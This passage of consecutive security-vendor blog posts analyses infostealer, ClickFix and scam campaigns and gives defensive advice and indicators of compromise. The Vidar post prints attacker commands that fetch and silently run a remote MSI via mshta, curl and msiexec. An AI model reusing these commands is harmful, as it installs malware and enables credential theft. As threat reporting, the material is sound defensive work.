  • Hardware utilities (e.g. OhmGraphite, Pachtop, HardwareVisualizer, Sidebar Diagnostics)
  • Mining software
  • Games, cheats, and mods (e.g. Xeno)

It’s hosted or shared across multiple distribution channels, including:

  • Fake websites impersonating legitimate services, like Proton VPN
  • Code hosting platforms like GitHub and GitLab
  • File hosting services such as MediaFire and SourceForge
  • Links and redirects from gaming- and security-related YouTube videos

Although there are many distribution methods, in this blog we look at two cases:

  • Case 1: A free web hosting provider distributing a malicious ZIP file that loads the stealer using self-injection
  • Case 2: Fake websites that load the stealer using DLL hijacking and injection into the RegAsm process

Case 1: Free web hosting provider distributes the stealer

The first case is the most unexpected. We found that a free web hosting provider, onworks[.]net, hosts ZIP files in its download section that ultimately distribute the stealer.

The website, ranked in the top 100,000, allows users to run virtual machines entirely in the browser.

Virtual machine running in the browser
Virtual machine running in the browser

Through this site, users download a malicious ZIP with names like:

  • OhmGraphite-0.36.1.zip
  • Sidebar Diagnostics-3.6.5.zip
  • Pachtop_1.2.2.zip
  • HardwareVisualizer_1.3.1.zip
One of the pages that downloads the malicious archive
One of the pages that downloads the malicious archive

In this case, the malicious code responsible for loading the stealer is embedded in the executable, for example HardwareVisualizer.exe.

The loader that starts the infection chain
The loader that starts the infection chain

The loader contains junk code to make analysis more difficult and performs several operations, including:

  • Checking the environment for analysis tools and terminating if detected
  • Implementing a custom decryption function for strings
  • Resolving functions using LoadLibraryA and GetProcAddress
  • Decrypting and loading the next stage using AES-CBC via BCrypt APIs

This isn’t the only way the stealer is distributed. We found similar lures, with the same ZIP names, that instead distribute the stealer via DLL hijacking.

In this case, HardwareVisualizer.exe is actually the WinRAR executable, and the malicious code resides in WindowsCodecs.dll.

The WinRAR executable with the malicious DLL
The WinRAR executable with the malicious DLL

While tracking the DLL loader, we also saw it distributed in other campaigns with different lures. For example, in the second case analyzed, this malicious DLL is delivered through fake websites.

Case 2: Fake Proton VPN website and DLL loader

In the second case, we detected a website impersonating Proton VPN that delivers a malicious ZIP. This archive executes the stealer using DLL hijacking or an MSI file. To be clear, this has no affiliation with Proton VPN, and we’ve contacted them to let them know what we found.

Links to the website appear in several compromised YouTube channels, along with AI-generated videos demonstrating the installation process:

  • Youtube channels with malicious Proton VPN links.
  • Youtube channels with malicious Proton VPN links.
  • Youtube channels with malicious Proton VPN links.
  • Youtube channels with malicious Proton VPN links.
  • Youtube channels with malicious Proton VPN links.
  • Youtube channels with malicious Proton VPN links.
Fake website distributes the stealer via DLL hijacking
Fake website distributes the stealer via DLL hijacking
Folders containing the malicious DLL
Folders containing the malicious DLL 

In other infection chains, this DLL appears under different names, such as:

  • iviewers.dll
  • TextShaping.dll
  • CrashRpt1403.dll

This DLL decrypts two embedded resources. The decryption method varies between samples: Some use custom AES implementations, while others rely on the OpenSSL library.

One of the decrypted resources is a second-stage DLL, runpeNew.dll, which is loaded and executed via the GetGet method.

The second-stage DLL starts a process (such as RegAsm) and performs process hollowing using low-level APIs, including:

  • NtProtectVirtualMemory
  • NtCreateUserProcess
  • NtUnmapViewOfSection
  • NtAllocateVirtualMemory
  • NtResumeThread

The final payload: NWHStealer

At the end of these infection chains, the attacker deploys NWHStealer. The stealer runs directly in memory or injects itself into other processes such as RegAsm.exe.

It enumerates more than 25 folders and registry keys associated with cryptocurrency wallets.

Enumeration phase of wallets
Enumeration phase of wallets

The stealer also collects and exfiltrates data from multiple browsers, including Edge, Chrome, Opera, 360 Browser, K-Melon, Brave, Chromium, and Chromodo.

Enumeration of browser folders.
Enumeration of browser folders
Enumeration of browser extensions.
Enumeration of browser extensions

Additionally, it injects a DLL into browser processes such as msedge.exe, firefox.exe, or chrome.exe. This DLL extracts and decrypts browser data before sending it to the command-and-control (C2) server.

The injected DLL in Microsoft Edge
The injected DLL in Microsoft Edge 

The injected DLL also executes a PowerShell command that:

  • Creates hidden directories in LOCALAPPDATA
  • Adds those directories to Windows Defender exclusions
  • Forces a Group Policy update
  • Encrypts a getPayload request and sends it to the C2
  • Receives and executes additional payloads disguised as system processes (e.g., svchost.exe, RuntimeBroker.exe)
  • Creates scheduled tasks to run the payload at user logon with elevated privileges

Data sent to the C2 is encrypted using AES-CBC. If the primary server is unavailable, the malware can retrieve a new C2 domain via a Telegram-based dead drop.

Dead drop resolver via Telegram
Dead drop resolver via Telegram
JSON containing various information about the compromised system
JSON containing various information about the compromised system

The stealer also uses a known CMSTP User Account Control (UAC) bypass technique to execute PowerShell commands:

  • Generates a random .inf file in the temp folder
  • Uses cmstp.exe to elevate privileges
  • Automatically confirms the prompt using Windows APIs

How to stay safe

Instead of relying on phishing emails or obvious scams, the attackers behind this campaign are hiding malware inside tools people actively search for and trust. By spreading through platforms like GitHub, SourceForge, and YouTube, they increase the chances that users will let their guard down.

Once installed, the impact can be serious. Stolen browser data, saved passwords, and cryptocurrency wallet information can lead to account takeovers, financial loss, and further compromise.

Here are our tips for avoiding being caught out:

  • Download software only from official websites
  • Be cautious with downloads from GitHub, SourceForge, or file-sharing platforms unless you trust the source
  • Check file signatures and publisher details before running anything
  • Avoid downloading tools from links in YouTube descriptions
  • Pro tip: Install Malwarebytes Browser Guard on your browser to block malicious URLs.

Indicators of Compromise (IOCs)

Check the signature and version of software in suspicious archives.

Hashes

e97cb6cbcf2583fe4d8dcabd70d3f67f6cc977fc9a8cbb42f8a2284efe24a1e3

2494709b8a2646640b08b1d5d75b6bfb3167540ed4acdb55ded050f6df9c53b3

Domains

vpn-proton-setup[.]com (fake website)

get-proton-vpn[.]com (fake website)

newworld-helloworld[.]icu (C2 domain)

https://t[.]me/gerj_threuh (Telegram dead drop)

URLS

https://www.onworks[.]net/software/windows/app-hardware-visualizer

https://sourceforge[.]net/projects/sidebar-diagnostics/files/Sidebar%20Diagnostics-3.6.5.zip

https://github[.]com/PieceHydromancer/Lossless-Scaling-v3.22-Windows-Edition/releases/download/Fps/Lossless.Scaling.v3.22.zip

This is only a partial list of malicious URLs. Download the Malwarebytes Browser Guard plugin for full protection and to block the remaining malicious URLs.

Hacked sites deliver Vidar infostealer to Windows users

16 March 2026 at 18:15

In recent years, ClickFix and fake CAPTCHA techniques have become a popular way for cybercriminals to distribute malware. Instead of exploiting a technical vulnerability, these attacks rely on convincing people to run malicious commands themselves.

Our researchers have recently detected a campaign that ultimately delivers the Vidar infostealer, using several different infection chains.

One of the methods used in this campaign involves installing a malicious installer delivered through fake CAPTCHA pages hosted on compromised WordPress websites. We detected a number of compromised websites involved in the campaign, located in countries including Italy, France, the United States, the United Kingdom, and Brazil.

What is Vidar?

Vidar is a well-known infostealer malware family designed to harvest sensitive data from infected systems. It typically targets:

  • Browser-stored usernames and passwords
  • Cryptocurrency wallet information
  • Session cookies and authentication tokens
  • Autofill data and saved payment information
  • Files that may contain sensitive data

Because Vidar loads in memory and communicates with remote command servers, it can quietly collect and exfiltrate data without obvious signs of infection.

Fake CAPTCHA: the never-ending story

When a user visits a compromised website, they may see a screen mimicking Cloudflare’s familiar “Verifying you are human” page.

This technique has been widely used since 2024 and has evolved through numerous variations over time, both in its visual appearance and in the malicious commands that start the infection chain.

Verify you are human
The fake CAPTCHA message shown to the user.

The page instructs the visitor to copy and run a malicious command that starts the infection chain, in this case:

mshta https://{compromised website}/challenge/cf

Mshta is a legitimate Windows binary designed to execute Microsoft HTML Application (HTA). Because it is built into Windows, attackers have abused it since the early days of the ClickFix campaigns.

In this case, the command launches a simple obfuscated HTA script, which eventually downloads and installs malware associated with the Vidar infostealer.

HTA-based MSI dropper

The HTA script is the intermediate stage that downloads and runs a malicious MSI installer. An MSI is a Windows installation package normally used to install software, but attackers frequently abuse it to deliver malware.

The script performs several operations:

  • The window is resized to 0x0 and moved off-screen, making the application invisible to the user.
  • The script terminates if the document.location.href doesn’t start with http.
  • The strings are decoded using XOR and a random key.
  • Through WMI queries, the script checks for installed antivirus products.
  • It creates hidden working folders in a random folder under \AppData\Local to drop the MSI file.
  • In the end, the script downloads the malicious MSI from a compromised website. The downloaded file must be larger than 100 KB to be considered valid. Finally, it removes the :Zone.Identifier alternate data stream.
The malicious HTA script
The malicious HTA script.

In this case, the malicious MSI was downloaded using the following command:

C:\Windows\System32\curl.exe" -s -L -oC:\Users\user\AppData\Local\EdgeAgent\WebCore\cleankises.msihttps://{compromised-website}/474a2b77/5ef46f21e2.msi

Afterward, the malicious MSI was executed with:

"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\EdgeAgent\WebCore\cleankises.msi" /qn

MSI and GoLang loader

The MSI defines a CustomAction ConfigureNetFx, and it executes a GoLang loader.

Malware loaders (also known as droppers or downloaders) are common tools in the cybercrime ecosystem. Their main job is to stealthily compromise a system and then deliver one or more additional malware payloads.

In this campaign, the loader ultimately decrypts and executes the Vidar infostealer. The executable has different names in the different MSI samples analyzed.

The custom action defined in the MSI.
The custom action defined in the MSI.

The Golang loader decodes a shellcode that performs different anti-analysis checks, including:

CheckRemoteDebuggerPresent

IsDebuggerPresent

QueryPerformanceCounter

GetTickCount

After several intermediate steps, the loader decrypts and loads Vidar infostealer directly into memory.

Analysis of compromised websites

The malicious iframe injected into the compromised websites was generated by the domains cdnwoopress[.]com or woopresscdn[.]com in the analyzed cases.

The malicious iframe injected into the compromised website.
The malicious iframe injected into the compromised website.

The injected code has several functions, and the command used in the fake CAPTCHA attack is obtained from the /api/get_payload endpoint.

Code injected into the compromised websites.
Code injected into the compromised websites.

Because the malicious website was misconfigured, we were able to view the backend code injected into the compromised WordPress sites.

The injected script performs several actions:

  • Creates the file wp-cache-manager.php if it doesn’t already exist, obtaining its contents from the endpoint /api/plugin.
  • Sends a heartbeat request every hour containing the domain name, site URL, WordPress version, and status.
  • During page loads (template_redirect), the script filters visitors based on User-Agent and targets Windows desktop visitors.
  • Requests /api/inject?domain=domain from the remote command server. The response HTML is then displayed, replacing the normal WordPress page.
The malicious code injected in the compromised WordPress site.
The malicious code injected in the compromised WordPress site.

How to stay safe

Attacks like this rely on tricking people into running commands themselves, so a few simple precautions can make a big difference.

  • Slow down. If a webpage asks you to run commands on your device or copy and paste code, pause and think before following the instructions. Cybercriminals often create a sense of urgency with fake security checks, countdown timers, or warnings designed to make you act without thinking.
  • Never run commands from untrusted sources. A legitimate website should never require you to press Win+R, open Terminal, or paste commands into PowerShell just to verify you are human. If a page asks you to do this, treat it as suspicious.
  • Verify instructions independently. If a website tells you to execute a command or perform a technical action, check official documentation or contact support through trusted channels before doing anything.
  • Be cautious with copy and paste. Some attacks hide malicious commands in copied text. If you ever need to run a command from documentation, typing it manually can help reduce the risk of running hidden code.
  • Protect your device. Keep your operating system and browser updated and use security software that can block malicious websites and detect infostealer malware.
  • Stay informed. Techniques like fake CAPTCHA pages and ClickFix attacks continue to evolve. Knowing that attackers may try to trick you into running commands yourself can help you spot these scams before they succeed.

Pro tip: The free Malwarebytes Browser Guard extension can warn you if a website attempts to copy content to your clipboard, which may help prevent this type of attack.

Indicators of Compromise (IOCs)

Domains

  • cdnwoopress[.]com: Fake CAPTCHA Infrastructure
  • woopresscdn[.]com: Fake CAPTCHA Infrastructure
  • walwood[.]be: Fake CAPTCHA Infrastructure
  • telegram[.]me/dikkh0k: Vidar C2
  • telegram[.]me/pr55ii: Vidar C2
  • steamcommunity[.]com/profiles/76561198742377525: Vidar C2
  • steamcommunity[.]com/profiles/76561198735736086: Vidar C2

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Watch out for fake Malwarebytes renewal notices in your calendar

13 March 2026 at 16:48

We’ve become aware of a scam campaign sending fake calendar invites that impersonate Malwarebytes and attempt to trick recipients into calling a scam “billing support” number. 

We have written before about how calendar invites can be abused for phishing, and even about how Google Calendar invites can be weaponized to steal private data

The amounts in these fake invites are large and attention-grabbing, usually several hundred dollars for multiple years of service.  

The scammers want you to believe a considerable charge has already gone through so that you react immediately instead of thinking critically. 

The goal is to get you to call, rather than click a link. The calendar description reads like a receipt, but the real call to action is always the same: urging you to call a number immediately to dispute or cancel the charge. m

Once you call, the scammer can pressure you in real time. They might ask for payment details, convince you to install remote-access software, or manipulate you into sending money. 

What the fake calendar invite looks like 

Text from the fake calendar invite
Text from the fake calendar invite

The body of the calendar invite is crammed with fake details intended to look like they came from a billing system: 

  • Multiple ID lines, such as Membership ID, Client UID, Customer ID, Service Number
  • A string of made-up transaction or account codes
Text from the fake calendar invite
This one even sells a product that isn’t in our portfolio

The language and formatting scream copied-and-pasted scam script rather than professional communication. 

There are several inconsistencies you can look for: 

Unnatural or incorrect phrasing: 

  • “Membership Duration: 4yrold” 
  • “We’re thrilled to have you with us for another year!” (in a 4-year renewal notice) 
  • “Your membership benefits remain fully active.” 

Inconsistent capitalization and formatting: 

  • “FOUR YEAR (All Caps)” 
  • “04 Year” 
  • “USD344.55” 

Phone numbers written with odd punctuation:  

  • 1.810.228.8708  
  • 1 865 3849684 

Overly effusive, generic greetings and closings: 

  • “Dear Sir/Madam,” “Greetings to all,” “Hello there”
  • “Yours in Respect,” “Much Gratitude,” “Always Appreciative,” “With Joy, best regards,” 

Individually, any one of these might just be sloppy writing. Seeing many of them together in an unsolicited billing notice is a strong indicator of fraud. 

What happens if you call the number 

The calendar invite itself doesn’t charge you anything. Its purpose is to trick you into calling the scammer’s phone number.  

Once they have you on the line, several things can happen. 

Stealing payment card and bank details 

A common script goes like this: 

You call, upset about the huge “renewal.” 

The scammer agrees it’s a mistake and says they can “reverse the charge.” 

They then ask for: 

  • Your full card number, expiry date, and CVV. 
  • Your bank account and routing number. 
  • One-time passcodes sent by your bank “to confirm the refund.” 

Once they have that information, they can: 

  • Make unauthorized purchases or withdrawals. 
  • Enroll you in other fraudulent subscriptions. 
  • Use your card details for further identity theft. 

The phony renewal is just a pretext to make handing over financial data feel reasonable. 

Convincing you to send money directly 

In some versions, the scammer pretends to refund you too much. They may: 

  • Ask you to log in to online banking while they’re on the phone. 
  • Direct you to move money or manipulate your account, sometimes with remote-access software. 
  • Claim there’s been an error, and you must “return” the over-refund, often via unusual methods like gift cards, cryptocurrency, wire transfer, or peer-to-peer payment apps. 

The result is that you send them real money to fix a problem that never existed. 

Getting remote access to your computer 

Tech support-style scammers often escalate the call by asking you to install legitimate remote-access tools like AnyDesk, TeamViewer, and others. 

They claim they need access: 

  • to cancel the subscription 
  • to verify your account 
  • or to help you process the refund 

Once on your machine, they can: 

  • Capture passwords and session cookies
  • Move files or install malware
  • Manipulate what you see in your browser (for example, by editing HTML to “prove” a refund went through)

The longer they stay connected, the more damage they can do. 

Harvesting personal information for later fraud 

Even if you hang up before giving bank details, the scammer may still try to extract: 

  • Full name, address, and date of birth 
  • Email addresses and passwords to “locate your account”
  • Answers to common security questions (first school, mother’s maiden name, etc.)

Combined with other breached data, this information can be used later for: 

  • New account fraud (like opening loans or credit cards in your name)
  • Account takeovers of your email, cloud storage, or other services
  • Targeted phishing attacks that reference the earlier call

Building trust for future scams 

Don’t be fooled. The person on the phone will usually sound patient, polite, and professional. They’re trying to convince you they work for the company named in the invite and normalize the idea that you should call them any time there’s a billing issue. 

Once they’ve gained your trust, they may: 

  • Call you back weeks or months later with a new story
  • Sell your details to other scammers who know you’re likely to respond

The one constant: they want you to act quickly and privately. The objective is to rush you into dealing with them, and only them, instead of checking independently with your bank or the real company. 

How to recognize calendar scams 

Legitimate companies send invoices and renewal confirmations as emails, in-app messages, or account notifications. They don’t send them as calendar appointments created by random people using private email addresses. 

Red flags include: 

  • The “bill” appears as an event in Google Calendar, Outlook, or another calendar app. 
  • The title looks like a transaction status instead of a meeting: 
    • “Subscription Renewal Notice: [random code]” 
    • “Payment Processed Successfully: [random code]” 
    • “Renewal Approved: [random code]” 
  • You didn’t schedule this event yourself. 

If a “receipt” shows up in your calendar instead of through your normal billing channels, treat it as suspicious by default. 

How to remove fake entries from your calendar 

We’ve included instructions in our article how to remove fake entries from your calendar, which covers how to do it on Outlook calendar, Gmail calendar, Android calendar, Mac calendar, and iPhone and iPad calendars. 

How to prevent calendar spam 

We’ve covered some of this already, but the main precautions are: 

  • Turn off auto-add or auto-processing so invites stay as emails until you accept them. 
  • Restrict calendar permissions so only trusted people and apps can add events. 
  • In shared or resource calendars, remove public or anonymous access and limit who can create or edit items. 
  • Use an up-to-date real-time anti-malware solution with a web protection component to block known malicious domains. 
  • Don’t engage with unsolicited events. Don’t click links, open attachments, or reply to suspicious calendar events such as “investment,” “invoice,” “bonus payout,” “urgent meeting”—just delete the event. 
  • Enable  multi-factor authentication (MFA) on your accounts so attackers who compromise credentials can’t abuse the account itself to send or auto-accept invitations. 

Pro tip:  If you’re not sure whether an event is a scam, you can paste the message into Malwarebytes Scam Guard. It can help you decide what to do next. 

IOCs 

Phone numbers involved in these scams are: 

  • (810) 228-2614 
  • (810) 228-8708
  • (810) 268-6113 
  • (865) 384-9684
  • (865) 385-0070 

We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.

Attackers impersonate Temu in ClickFix $Temu airdrop scam

13 March 2026 at 10:30

Update Friday, March 13: A Temu spokesperson contacted us to say: “Temu has not issued any cryptocurrency, token, or digital asset—including any so-called “Temu Coin.” Any airdrop, wallet claim, or cryptocurrency offer purporting to be from Temu is fraudulent and has no connection to our company.”

We’ve covered ClickFix campaigns before: the fake CAPTCHAs, the fake Windows updates, the trick of getting victims to paste malicious commands into their own machines. Now we’ve identified a campaign that uses the opening initial steps seen in ClickFix attacks, but what happens after is different enough to warrant a closer look.

It starts with a convincing fake website promoting a $TEMU airdrop, a fabricated cryptocurrency that uses the name of the well-known shopping platform TEMU. It ends with a remote-access backdoor that checks in with its operators and runs instructions streamed from the internet instead of storing them locally, making it much harder for traditional antivirus tools to detect.

Same opener, different game

Fake $TEMU Airdrop crypto site

If you’ve read our earlier coverage of ClickFix, you know the drill: a webpage that looks like a security check, instructions to press Win+R and paste something, and the user ends up executing a malicious command on their own system. 

This campaign’s lure is a polished fake website that mimics a $TEMU cryptocurrency airdrop. “Discover Exclusive $TEMU Airdrop,” it announces, complete with a logo and navigation bar designed to look like a legitimate crypto project. There is no such coin. The site exists purely to get visitors to click a fake “I’m not a robot” checkbox.

Complete these verification steps

Clicking it triggers a modal titled “Complete these Verification Steps,” which walks the victim through opening a command prompt window using Win+R, then pressing Ctrl+V to paste whatever is waiting on their clipboard and hitting Enter.

For anyone who hesitates, there is a “Video Instructions” button that expands an embedded screen recording demonstrating each keypress in sequence. It’s effectively a help-desk style tutorial guiding victims through executing the attackers’ command. At the bottom of the modal, a fake reCAPTCHA badge reads “Verification ID: 4963,” lending it the appearance of a legitimate security check. What sets this campaign apart is everything that happens after that Enter key is pressed.

First, the malware identifies the host

power

Earlier in the infection chain, the loader collects basic host information and sends it to the command server. The payload returned by the server already contains a unique identifier assigned to the victim machine. In the decoded PowerShell stage, this appears as a variable such as $machine_id, which is embedded directly in the script delivered to the infected system.

Embedding a unique identifier in the returned payload allows the attackers to track individual infections from the moment a machine first checks in. Because this identifier is inserted into the script before it reaches the victim, the server can generate slightly different payloads for different systems.

This matters more than it sounds. Security companies maintain shared databases of known-bad files. When a malicious file is identified, its fingerprint can be added to those databases within hours. If attackers generate slightly different versions of a payload for different victims, traditional file-hash-based detection becomes far less effective because there is no single file signature for defenders to block.

A windowless house guest

With the profiling done, the campaign deploys its backdoor using a bundled Python runtime. This is the same programming language used every day by millions of developers and students. It arrives self-contained, needs no administrator permissions, and does not typically appear as a traditional installed application. The version that actually runs is called pythonw.exe, where the “w” stands for “windowless.” No console, no sound, and nothing in the taskbar.

Earlier Python-based ClickFix campaigns that have been documented delivered a static Python file that performed a fixed task. This campaign appears to take a different approach. Each time the hidden process checks in with the server, it retrieves a new piece of Python code and executes it directly in memory rather than storing it as a persistent script on disk.

This architecture allows the attackers to change the malware’s behavior simply by modifying the code delivered by the server. Different victims can receive different instructions, and the functionality of the infection can be altered without updating anything already present on the compromised machine.

What they can do with an open door

Because the server can send any Python code it likes, the attackers’ capabilities are largely determined by whatever code the command server delivers. In campaigns using similar backdoors, attackers have been observed stealing browser credentials and session cookies, recording keystrokes, taking screenshots, and using the foothold to reach other machines on the same network. The campaign also included infrastructure to notify the attackers via Telegram the moment a new victim checked in—though a debug flag in the decoded payload was set to disabled, suggesting either a campaign in active development or deliberate operational caution.

Python also makes for convenient camouflage. Many corporate security systems include it on their list of trusted applications that are allowed to reach the internet without scrutiny. A Python process sending data outbound can look, at a glance, like a developer running a routine script. Detecting this type of activity typically requires behavior-based monitoring rather than file-signature scanning, making it harder to detect for most security tools.

ClickFix keeps evolving

ClickFix campaigns keep evolving because the core trick sidesteps technical defenses entirely. The victim executes the malicious command themselves.

Earlier this year we covered how attackers switched from PowerShell to nslookup after security software began detecting the original technique. This campaign tackles the same problem from a different angle: instead of changing how the malware is delivered, it tries to ensure there is no stable file left behind.

The backdoor receives instructions dynamically rather than storing them on disk, and the payload can vary for each victim. Without a consistent file to analyze, traditional file-signature detection has much less to work with.

How to stay safe

Here’s some general ClickFix advice that should help you avoid falling victim:

  • Slow down. Don’t rush to follow instructions on a webpage or prompt, especially if it asks you to run commands on your device or copy-paste code. Attackers rely on urgency to bypass your critical thinking, so be cautious of pages urging immediate action. Sophisticated ClickFix pages add countdowns, user counters, or other pressure tactics to make you act quickly.
  • Avoid running commands or scripts from untrusted sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. Verify instructions independently. If a website tells you to execute a command or perform a technical action, check through official documentation or contact support before proceeding.
  • Limit the use of copy-paste for commands. Manually typing commands instead of copy-pasting can reduce the risk of unknowingly running malicious payloads hidden in copied text.
  • Secure your devices. Use an up-to-date, real-time anti-malware solution with a web protection component.
  • Educate yourself on evolving attack techniques. Understanding that attacks may come from unexpected vectors and evolve helps maintain vigilance. Keep reading our blog!

Pro tip: Did you know that the free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard?

If you think you’ve been affected

However, if you are past that point and suspect this specific campaign, here is what to check.

  • Look inside %LOCALAPPDATA%\Programs\Python\ for a folder called Python3133 that you did not install. That is the malware’s Python runtime.
  • Open %TEMP% and look for a file called temp_settings. Its presence is the tracking marker this campaign leaves behind.
  • Open Task Manager, go to the Startup tab, and look for pythonw.exe running from an AppData or Program Files\Python3133 location.
  • Change passwords for important accounts from a clean device and revoke active sessions where possible.

Indicators of Compromise (IOCs)

Domains

• temucoin[.]lat


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Phishers hide scam links with IPv6 trick in “free toothbrush” emails

11 March 2026 at 19:17

A recurring lure in phishing emails impersonating United Healthcare is the promise of a free Oral-B toothbrush. But the interesting part isn’t the toothbrush. It’s the link.

two email examples
Two examples of phishing emails

Recently we found that these phishers have moved from using Microsoft Azure Blob Storage (links looking like this:

https://{string}.blob.core.windows.net/{same string}/1.html

to links obfuscated by using an IPv6-mapped IPv4 address to hide the IP in a way that looks confusing but is still perfectly valid and routable. For example:

http://[::ffff:5111:8e14]/

In URLs, putting an IP in square brackets means it’s an IPv6 literal. So [::ffff:5111:8e14] is treated as an IPv6 address.

::ffff:x:y is a standard form called an IPv4-mapped IPv6 address, used to represent an IPv4 address inside IPv6 notation. The last 32 bits (the x:y part) encode the IPv4 address.

So we need to convert 5111:8e14 to an IPv4 address. 5111 and 8e14 are hexadecimal numbers. In theory that means:

  1. 0x5111 in decimal = 20753
  2. 0x8e14 in decimal = 36372

But for IPv4-mapped addresses we really treat that last 32 bits as four bytes. If we unpack 0x51 0x11 0x8e 0x14:

  1. 0x51 = 81
  2. 0x11 = 17
  3. 0x8e = 142
  4. 0x14 = 20

So, the IPv4 address this URL leads to is 81.17.142.20

The emails are variations on a bogus reward from scammers pretending to be United Healthcare that uses a premium Oral‑B iO toothbrush as bait. Victims are sent to a fast‑rotating landing page where the likely endgame is the collection of personally identifiable information (PII) and card data under the guise of confirming eligibility or paying a small shipping fee.

How to stay safe

What to do if you entered your details

If you submitted your card details:

  • Contact your bank or card issuer immediately and cancel the card
  • Dispute any unauthorized charges
  • Don’t wait for fraud to appear. Stolen card data is often used quickly
  • Change passwords for accounts linked to the email address you provided
  • Run a full scan with a reputable security product

Other ways to stay safe:

Indicators of Compromise (IOCs)

81.17.142.40

15.204.145.84

redirectingherenow[.]com

redirectofferid[.]pro


We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.

Watch out for tax-season robocalls pushing fake “relief programs”

11 March 2026 at 14:30

While Americans are sorting through paperwork to get their taxes filed in time, scammers are working overtime to grab a piece of the action.

As tax season ramps up, so does scam activity. Our telemetry shows a spike in robocalls impersonating tax resolution firms, tax relief agencies, and vaguely named “assistance centers.” These calls are designed to create urgency, fear, and confusion in the hope of pushing recipients to call back before they have time to think critically.

These robocalls typically try to collect personal information, pressure victims into paying fake tax debts, or funnel them into questionable tax-relief services.

Below are transcripts of two recent voicemail examples submitted by anonymized Scam Guard users that illustrate how these scams operate.

The scripts: different names, similar playbook

Voicemail #1

“Hi, this is <REDACTED_NAME> calling on March 3rd from the eligibility support and review division at the tax resolution assistance center.  I’m contacting you because your account remains under active confirmation review.  There is still an opportunity to verify your standing while this evaluation period remains open.  To make this simple, we provide a direct proprietary verification line with no weight, allowing immediate access to clear and accurate information.  This verification step is brief and focused strictly on determining current eligibility and available options.  Please call back at 888-919-9743.  Again, 888-919-9743.  If this message reached you in error, please call back and press 3 to be removed”

Characteristics:

  • Claims to be from an “eligibility support and review division at the tax resolution assistance center.”
  • Says your “account remains under active confirmation review.”
  • Offers a “direct proprietary verification line.”
  • Urges quick action while the “evaluation period remains open.”
  • Provides a callback number and an opt-out option.

Voicemail #2

“Hi, this is <REDACTED_NAME> with professional tax associates. Today is Tuesday March 3rd. I’m calling to follow up on back taxes and missed filings. This may be our only attempt to reach you, and due to new resolution programs that are available for a limited time, we highly recommend you give us a call today. This will be your best opportunity to get a fresh start before it becomes a bigger and permanent issue. Please call us back today at 8338204216 again 8338204216. If you’ve already resolved this issue. You may disregard this message or call back using the number on your caller ID to opt out. Thank you. If you were reached in error or wish to stop future outreach, please press 8 now and you will be removed from future outreach. Thank you and we look forward to assisting you. “

Characteristics:

  • Claims to be with “professional tax associates.”
  • References “back taxes and missed filings.”
  • Warns this “may be our only attempt to reach you.”
  • Mentions “new resolution programs available for a limited time.”
  • Provides a callback number and opt-out instructions.

What these robocalls have in common

While the wording differs slightly, the structure and psychological tactics are nearly identical.

Both messages use generic but authoritative language:

  • “Eligibility support and review division”
  • “Tax resolution assistance center”
  • “Professional tax associates”

These names sound legitimate but don’t identify a specific, verifiable company. Scammers often rely on institutional-sounding phrases to create credibility without providing any real details.

Both messages also reference vague “account” problems, but neither voicemail mentions:

  • Your name
  • A specific tax year
  • A case number
  • A known agency like the IRS

Instead, they reference:

  • “Active confirmation review”
  • “Back taxes and missed filings”
  • “Eligibility and available options”

This vagueness is intentional. It allows the same robocall script to target thousands of people, regardless of their actual tax situation.

What you will always see with scams is urgency. Both calls attempt to rush the recipient into action:

  • “There is still an opportunity… while this evaluation period remains open.”
  • “This may be our only attempt to reach you.”
  • “Limited time resolution programs.”
  • “Call today.”

Creating urgency reduces the likelihood that someone will pause, research the number, or consult a trusted source.

The second voicemail includes the promise of a “fresh start before it becomes a bigger and permanent issue.” This is a common emotional hook, blending fear (a permanent problem) with hope (a fresh start), which can encourage impulsive callbacks.

Both messages push recipients to call a direct number rather than referencing an official website or established contact method. Legitimate tax agencies, including the IRS, do not initiate contact through unsolicited robocalls asking you to call back immediately.

Both scripts include instructions like:

  • “Press 3 to be removed.”
  • “Press 8 now and you will be removed.”
  • “Call back using the number on your caller ID to opt out.”

These opt-out options create an illusion of compliance and legitimacy. In reality, pressing numbers or calling back can confirm that your phone number is active, which may lead to more scam calls.

How to stay safe

Knowing how to identify scam calls is an important step. So, here are some key red flags to watch for:

  • No personalization
  • Vague agency names
  • Pressure to act immediately
  • Threat of missed opportunity
  • Promises of relief without verification
  • Instructions to call back a random 800/833/888 number
  • Robotic or heavily scripted tone

If a message checks at least one of these boxes, it is very likely not legitimate.

  • Before calling a number, verify it by visiting the official site directly.
  • Beware of unsolicited phone calls or emails, especially those that ask you to act immediately. Government agencies will not call out of the blue to demand sensitive personal or financial information.
  • Never provide sensitive personal information such as your bank account, charge card, or Social Security number over unverified channels. Instead use a secure method such as your online account or another application on IRS.gov.
  • Report scams to the IRS to help others.

We don’t just report on threats—we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your, and your family’s, personal information by using identity protection.

Quiz sites trick users into enabling unwanted browser notifications

9 March 2026 at 13:53

Our support team flagged a number of customers who suspected their device might be infected with malware, but Malwarebytes scans came up empty.

When the customers provided screenshots, our Malware Removal Support team quickly recognized the format as web push notifications.

The reason the scans came up clean is that these notifications aren’t malware on the device. They’re browser notifications from websites that trick users into clicking “Allow.”

We helped the customers disable the push notifications (see below for instructions). But since most of them didn’t know how they got them in the first place, we went down the rabbit hole to find out where they were coming from.

Examples of web push notifications
Examples of web push notifications

We started with one of the most prevalent domains called unsphiperidion[.]co.in, but all we found was a misleading advertisement that promised the Adguard browser extension and instead led to Poperblocker.

Screenshot showing fake "update the Adguard browser extension" prompt
Fake Adguard browser extension update prompt

